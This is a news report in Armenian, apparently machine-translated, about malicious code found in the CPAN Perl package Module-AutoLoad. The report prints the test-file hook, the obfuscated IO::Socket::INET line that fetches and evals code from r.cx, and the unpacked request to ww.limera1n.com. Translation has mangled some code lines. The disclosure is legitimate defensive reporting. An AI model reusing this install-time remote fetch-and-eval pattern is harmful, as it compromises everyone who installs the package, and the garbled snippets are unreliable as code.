ProHoster > Օրագիր > ինտերնետ նորություններ > Module-AutoLoad Perl փաթեթում հայտնաբերվել է վնասակար կոդ

Module-AutoLoad Perl փաթեթում հայտնաբերվել է վնասակար կոդ

CPAN գրացուցակի միջոցով բաշխված Perl փաթեթում Module-AutoLoad, որը նախատեսված է CPAN մոդուլներն ավտոմատ կերպով բեռնելու համար, բացահայտված վնասակար կոդ. Վնասակար ներդիրն էր հայտնաբերվել է թեստի կոդում 05_rcx.t, որը առաքվում է 2011 թվականից։
Հատկանշական է, որ հարցեր են ծագել կասկածելի կոդը բեռնելու վերաբերյալ Stackoverflow դեռ 2016թ.

Վնասակար գործողությունները հանգում են փորձին՝ ներբեռնելու և գործարկելու կոդը երրորդ կողմի սերվերից (http://r.cx:1/) մոդուլի տեղադրման ժամանակ գործարկված թեստային փաթեթի կատարման ընթացքում: Ենթադրվում է, որ արտաքին սերվերից ի սկզբանե ներբեռնված կոդը վնասակար չի եղել, սակայն այժմ հարցումը վերահղված է ww.limera1n.com տիրույթին, որն ապահովում է կոդի իր մասը կատարման համար։

Ներբեռնումը ֆայլում կազմակերպելու համար 05_rcx.t Օգտագործվում է հետևյալ կոդը.

իմ $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Նշված կոդը հանգեցնում է սցենարի կատարմանը ../contrib/RCX.pl, որի բովանդակությունը կրճատվում է տողով.

օգտագործել lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Այս սցենարը բեռնվում է շփոթված օգտվելով ծառայությունից perlobfuscator.com կոդը արտաքին հոսթից r.cx (նիշերի կոդերը 82.46.99.88 համապատասխանում են «R.cX» տեքստին) և այն կատարում է eval բլոկում:

$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88»::1″; տպել ;'
eval unpack u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Փաթեթավորումից հետո, ի վերջո, կատարվում է հետևյալը. կոդը:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
«;evalor return warn$@while$b;1

Խնդրահարույց փաթեթն այժմ հեռացվել է պահոցից: Դադարեցնել (Perl Authors Upload Server), և մոդուլի հեղինակի հաշիվն արգելափակված է: Այս դեպքում մոդուլը դեռ մնում է հասանելի է MetaCPAN-ի արխիվում և կարող է ուղղակիորեն տեղադրվել MetaCPAN-ից՝ օգտագործելով որոշ կոմունալ ծառայություններ, ինչպիսիք են cpanminus-ը: Նշվում էոր փաթեթը լայն տարածում չի գտել։

Հետաքրքիր է քննարկել միացված և մոդուլի հեղինակը, ով հերքել է այն տեղեկությունը, որ իր «r.cx» կայքի կոտրումից հետո վնասակար կոդ է տեղադրվել և բացատրել, որ ինքը պարզապես զվարճանում է, և օգտագործել է perlobfuscator.com-ը ոչ թե ինչ-որ բան թաքցնելու, այլ չափը փոքրացնելու համար։ կոդը և պարզեցնելով դրա պատճենումը clipboard-ի միջոցով: «botstrap» ֆունկցիայի անվան ընտրությունը բացատրվում է նրանով, որ այս բառը «հնչում է որպես bot և ավելի կարճ է, քան bootstrap»: Մոդուլի հեղինակը նաև վստահեցրել է, որ հայտնաբերված մանիպուլյացիաները չեն կատարում վնասակար գործողություններ, այլ միայն ցուցադրում են կոդի բեռնումը և կատարումը TCP-ի միջոցով։

Source: opennet.ru

Добавить комментарий